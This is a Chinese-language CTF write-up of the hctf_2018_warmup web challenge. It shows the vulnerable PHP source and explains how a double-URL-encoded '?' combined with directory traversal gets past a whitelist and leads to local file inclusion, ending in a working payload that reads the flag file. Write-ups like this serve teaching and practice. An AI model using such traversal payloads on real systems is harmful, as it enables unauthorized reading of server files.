BMZCTF hctf_2018_warmup

BMZCTF hctf_2018_warmup

目录

BMZCTF hctf_2018_warmup

代码审计

所以最终的payload

小结

---

之前做过一次，这次再细细分析一下

打开题目：

f12，可以看到提示,source.php

访问可以得到源码

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;  
            }

            if (in_array($page, $whitelist)) {
                return true;       //第一个返回true的地方
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;    //第二个返回true的地方
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;    //第三个返回true的地方，也就是我们利用的地方
            }
            echo "you can't see it";
            return false;
        }
    }
//主函数
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

同时也看到了hint.php，访问，得到

说明flag在根目录下的文件名字是flaaagg，不是flag

代码审计

代码分为两部分，前半部分是checkFile（$page）函数，后半部分是主函数。

从主函数顺着分析

（1）在source.php下，我们传入一个参数file，要求非空，是字符串，file参数传入checkFile（）函数返回是true，同时满足这三个条件则执行include（$file），这就是我们的利用点（文件包含）

（2）分析checkFile（）函数，我们可以很容易地发现有三个返回true地地方，我们一条一条来分析：

（3）第一个返回true的地方如下，意思是$page函数在$whitelist也就是白名单中，就返回true

$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

但是这个返回true必须要求$page是source.php或者hint.php中的一个，但是这样就无法利用文件包含include()了，所以此处无用，前往下一个返回true的地方。

（4）第二个返回true的地方如下

$_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

代码意思是我在$page后拼接了'?'，然后对新的$page进行截取，截取从第一个字符至第一个'?'出现的前一个字符，不理解的话，看下面我的复现

<?php     
        $page = "hello world";
	$_page = mb_substr($page , 0 ,mb_strpos($page . '?','?'));
	echo $_page."\n";
	
	$page1 = "hello wo?rld";
	$_page1 = mb_substr($page , 0 ,mb_strpos($page1 . '?','?'));
	echo $_page1;
	echo "\n";

结果：
hello world
hello wo

这里的话如果传入source.php? ，会在这里返回，但是不能构成文件包含flag的条件

同时，如果我们传入source.php?3f（%3f是字符?的url编码），但是实际传到$page的值还是source.php?

（5）第三个返回true的地方，

$_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                echo "第三次返回";
                return true;
            }
            echo "you can't see it";
            return false; 

首先将$_page进行url解码，然后函数截取$_page之前的部分，如果截取的部分刚好是白名单中的，则利用成功。

我们可以利用url二次编码，并且配合目录穿越，进行文件包含

首先如果我们将file的值定为source.php%253f（%253f是%3f的url编码）

经过实践，实际$page的值是source.php%3f，$_page也是source.php%3f，然后解码,变为source.php?，可以返回true，同时后边可以拼接../来进行目录穿越

（本地复现的时候进行的操作，方便分析，下图添加了echo $page）

结果

所以最终的payload

?file=source.php%253F/../../../../flaaagg
或者
?file=hint.php%253F/../../../../flaaagg

---

小结

还可以参考我之前写的一个wp，有本题中许多函数的解释，但是代码分析本篇还是更好一点

攻防世界 web 进阶题 001-012